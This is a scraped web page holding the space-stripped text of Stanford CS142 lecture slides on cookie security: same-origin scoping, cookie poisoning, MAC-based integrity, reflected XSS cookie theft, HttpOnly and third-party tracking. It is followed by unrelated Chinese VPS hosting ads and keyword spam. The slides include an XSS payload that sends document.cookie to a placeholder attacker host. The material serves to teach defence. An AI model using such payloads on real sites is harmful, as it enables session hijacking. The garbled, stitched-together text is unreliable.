overwritesphpecho

phpecho  时间:2021-05-20  阅读:()
CookieSameOriginPolicyDanBonehCS142Winter2009Monday:sessionmanagementusingcookiesSameoriginpolicy:"highlevel"Review:SameOriginPolicy(SOP)forDOM:OriginAcanaccessoriginB'sDOMifmatchon(scheme,domain,port)Today:SameOriginalPolicy(SOP)forcookies:Generallyspeaking,basedon:([scheme],domain,path)optionalscheme://domain:port/pathparamsscopeSetting/deletingcookiesbyserverDeletecookiebysetting"expires"todateinpastDefaultscopeisdomainandpathofsettingURLBrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;domain=(whentosend);path=(whentosend)secure=(onlysendoverSSL);expires=(whenexpires);HttpOnly(later)ifexpires=NULL:thissessiononlyScopesettingrules(writeSOP)domain:anydomain-suffixofURL-hostname,exceptTLDexample:host="login.
site.
com"login.
site.
comcansetcookiesforallof.
site.
combutnotforanothersiteorTLDProblematicforsiteslike.
stanford.
edupath:canbesettoanythingalloweddomainslogin.
site.
com.
site.
comdisalloweddomainsuser.
site.
comothersite.
com.
comCookiesareidentifiedby(name,domain,path)Bothcookiesstoredinbrowser'scookiejar;bothareinscopeoflogin.
site.
comcookie1name=useridvalue=testdomain=login.
site.
compath=/securecookie2name=useridvalue=test123domain=.
site.
compath=/securedistinctcookiesReadingcookiesonserver(readSOP)BrowsersendsallcookiesinURLscope:cookie-domainisdomain-suffixofURL-domain,andcookie-pathisprefixofURL-path,and[protocol=HTTPSifcookieis"secure"]Goal:serveronlyseescookiesinitsscopeBrowserServerGET//URL-domain/URL-pathCookie:NAME=VALUEExampleshttp://checkout.
site.
com/http://login.
site.
com/https://login.
site.
com/cookie1name=useridvalue=u1domain=login.
site.
compath=/securecookie2name=useridvalue=u2domain=.
site.
compath=/non-securebothsetbylogin.
site.
comcookie:userid=u2cookie:userid=u2cookie:userid=u1;userid=u2(arbitraryorder)Clientsideread/write:document.
cookieSettingacookieinJavascript:document.
cookie="name=value;expires=…;"Readingacookie:alert(document.
cookie)printsstringcontainingallcookiesavailablefordocument(basedon[protocol],domain,path)Deletingacookie:document.
cookie="name=;expires=Thu,01-Jan-70"document.
cookieoftenusedtocustomizepageinJavascriptjavascript:alert(document.
cookie)JavascriptURLDisplaysallcookiesforcurrentdocumentViewing/deletingcookiesinBrowserUICookieprotocolproblemsServerisblind:Doesnotseecookieattributes(e.
g.
secure)DoesnotseewhichdomainsetthecookieServeronlysees:Cookie:NAME=VALUEExample1:loginserverproblemsAlicelogsinatlogin.
site.
comlogin.
site.
comsetssession-idcookiefor.
site.
comAlicevisitsevil.
site.
comoverwrites.
site.
comsession-idcookiewithsession-idofuser"badguy"Alicevisitscs142hw.
site.
comtosubmithomework.
cs142hw.
site.
comthinksitistalkingto"badguy"Problem:cs142hwexpectssession-idfromlogin.
site.
com;cannottellthatsession-idcookiewasoverwrittenExample2:"secure"cookiesarenotsecureAlicelogsinathttps://www.
google.
com/accountsAlicevisitshttp://www.
google.
com(cleartext)NetworkattackercaninjectintoresponseSet-Cookie:LSID=badguy;secureandoverwritesecurecookieProblem:networkattackercanre-writeHTTPScookies!
HTTPScookievaluecannotbetrustedInteractionwiththeDOMSOPCookieSOP:pathseparationx.
com/Adoesnotseecookiesofx.
com/BNotasecuritymeasure:DOMSOP:x.
com/AhasaccesstoDOMofx.
com/Balert(frames[0].
document.
cookie);Pathseparationisdoneforefficiencynotsecurity:x.
com/AisonlysentthecookiesitneedsCookieshavenointegrity!
!
Storingsecuritydataonbrowser–Usercanchangeanddeletecookievalues!
!
Editcookiefile(FF3:cookies.
sqlite)ModifyCookieheader(FF:TamperDataextension)–Sillyexample:shoppingcartsoftwareSet-cookie:shopping-cart-total=150($)–Usereditscookiefile(cookiepoisoning):Cookie:shopping-cart-total=15($)Similartoproblemwithhiddenfields1617Notsosilly…(asof2/2000)D3.
COMPtyLtd:ShopFactory5.
8@RetailCorporation:@RetailAdgrafix:CheckItOutBaronConsultingGroup:WebSiteToolComCityCorporation:SalesCartCrestedButteSoftware:EasyCartDansie.
net:DansieShoppingCartIntelligentVendingSystems:IntellivendMake-a-Store:Make-a-StoreOrderPageMcMurtrey/Whitaker&Associates:Cart323.
0pknutsen@nethut.
no:CartMan1.
04RichMediaTechnologies:JustAddCommerce5.
0SmartCart:SmartCartWebExpress:Shoptron1.
2Source:http://xforce.
iss.
net/xforce/xfdb/4621Solution:cryptographicchecksums"value"shouldalsocontaindatatopreventcookiereplayandswapGoal:dataintegrityRequiressecretkeykunknowntobrowserBrowserServerkSet-Cookie:NAME=valueTCookie:NAME=valueTGeneratetag:T←F(k,value)Verifytag:T=F(k,value)19Example:.
NET2.
0–System.
Web.
Configuration.
MachineKeySecretwebserverkeyintendedforcookieprotectionStoredonallwebserversinsiteCreatinganencryptedcookiewithintegrity:–HttpCookiecookie=newHttpCookie(name,val);HttpCookieencodedCookie=HttpSecureCookie.
Encode(cookie);Decryptingandvalidatinganencryptedcookie:–HttpSecureCookie.
Decode(cookie);Cookietheft:basiccrosssitescripting(XSS)Example:reflectedXSSsearchfieldonvictim.
com:http://victim.
com/search.
phpterm=appleServer-sideimplementationofsearch.
php:SearchResultsResultsfor:.
.
.
echosearchtermintoresponseBadinputConsiderlink:(properlyURLencoded)http://victim.
com/search.
phpterm=window.
open("http://badguy.
comcookie="+document.
cookie)Whatifuserclicksonthislink1.
Browsergoestovictim.
com/search.
php2.
Victim.
comreturnsResultsfor…3.
Browserexecutesscript:Sendsbadguy.
comcookieforvictim.
com23SowhatWhywoulduserclickonsuchalinkPhishingemailLinkindoubleclickbannerad…manymanywaystofooluserintoclickingMANYotherformsofXSS(monday)ManydonotrequireclickingonlinksHttpOnlyCookiesIE6SP1,FF2.
0.
0.
5BrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;HttpOnlyCookiesentoverHTTP(s),butnotaccessibletoscriptscannotbereadviadocument.
cookieAlsoblocksaccessfromXMLHttpRequestheadersHelpspreventcookietheftviaXSS…butdoesnotstopmostotherrisksofXSSbugs.
(notSafari)THEEND3rdPartyCookies:usertracking3rdpartycookiesWhattheyare:UsergoestositeA.
com;obtainspagePagecontainsBrowsergoestoB.
com;obtainspageHTTPresponsecontainscookieCookiefromB.
comiscalleda3rdpartycookieTracking:UsergoestositeD.
comD.
comcontainsB.
comobtainscookiesetwhenvisitedA.
comB.
comknowsuservisitedA.
comandD.
comCanweblock3rdpartycookiesIEandSafari:blockset/writeIgnorethe"Set-Cookie"HTTPheaderfrom3rdpartiesSitesetscookieasa1stparty;willbegivencookiewhencontactedasa3rdpartyEnabledbydefaultinIE7FirefoxandOpera:blocksend/readAlwaysimplement"Set-Cookie",butneversendcookiesto3rdpartyBreakssess.
mgmt.
atseveralsites(offbydefault)Effectivenessof3rdpartyblockingIneffectiveforimprovingprivacy3rdpartycanbecomefirstpartyandthensetcookieFlashcookiesnotcontrolledbybrowsercookiepolicyIE8InPrivatebrowsingandChromeincognitoUponexit,deleteallbrowserstatecollectedwhileinprivatebrowsing

2021年全新Vultr VPS主机开通云服务器和选择机房教程(附IP不通问题)

昨天有分享到"2021年Vultr新用户福利注册账户赠送50美元"文章,居然还有网友曾经没有注册过他家的账户,薅过他们家的羊毛。通过一阵折腾居然能注册到账户,但是对于如何开通云服务器稍微有点不对劲,对于新人来说确实有点疑惑。因为Vultr采用的是预付费充值方式,会在每月的一号扣费,当然我们账户需要存留余额或者我们采用自动扣费支付模式。把笔记中以前的文章推送给网友查看,他居然告诉我界面不同,看的不对...

RAKsmart裸机云/云服务器/VPS全场7折,独立服务器限量秒杀$30/月起

适逢中国农历新年,RAKsmart也发布了2月促销活动,裸机云、云服务器、VPS主机全场7折优惠,新用户注册送10美元,独立服务器每天限量秒杀最低30.62美元/月起,美国洛杉矶/圣何塞、日本、香港站群服务器大量补货,1-10Gbps大带宽、高IO等特色服务器抄底价格,机器可选大陆优化、国际BGP、精品网及CN2等线路,感兴趣的朋友可以持续关注下。裸机云新品7折,秒杀产品5台/天优惠码:Bare-...

台湾云服务器整理推荐UCloud/易探云!

台湾云服务器去哪里买?国内有没有哪里的台湾云服务器这块做的比较好的?有很多用户想用台湾云服务器,那么判断哪家台湾云服务器好,不是按照最便宜或最贵的选择,而是根据您的实际使用目的选择服务器,只有最适合您的才是最好的。总体而言,台湾云服务器的稳定性确实要好于大陆。今天,云服务器网(yuntue.com)小编来介绍一下台湾云服务器哪里买和一年需要多少钱!一、UCloud台湾云服务器UCloud上市云商,...

phpecho为你推荐
psbAchrome计算机xpj^=iáíá=fq~=OQJOU==aJPPNMO=m~dê~ó=Thresholdcss支持ipad支持ipad勒索病毒win7补丁为了防勒索病毒,装了kb4012212补丁,但出现关机蓝屏的问题了,开机正常x-router思科路由器有线端无法上网,而无线段却可以,用的是PPPOE拨号上网,一开始两种方法都不可以,检查宽迅雷快鸟迅雷快鸟这种强盗软件不违规吗?css3按钮如何在html添加一个搜索框和一个按钮
域名批量查询 轻博客 网站实时监控 debian7 中国特价网 免费高速空间 免费申请网站 如何用qq邮箱发邮件 vip域名 电信主机 Updog 太原联通测速 监控服务器 lamp架构 摩尔庄园注册 免费php空间 阿里云邮箱个人版 netvigator 沈阳idc vpsaa 更多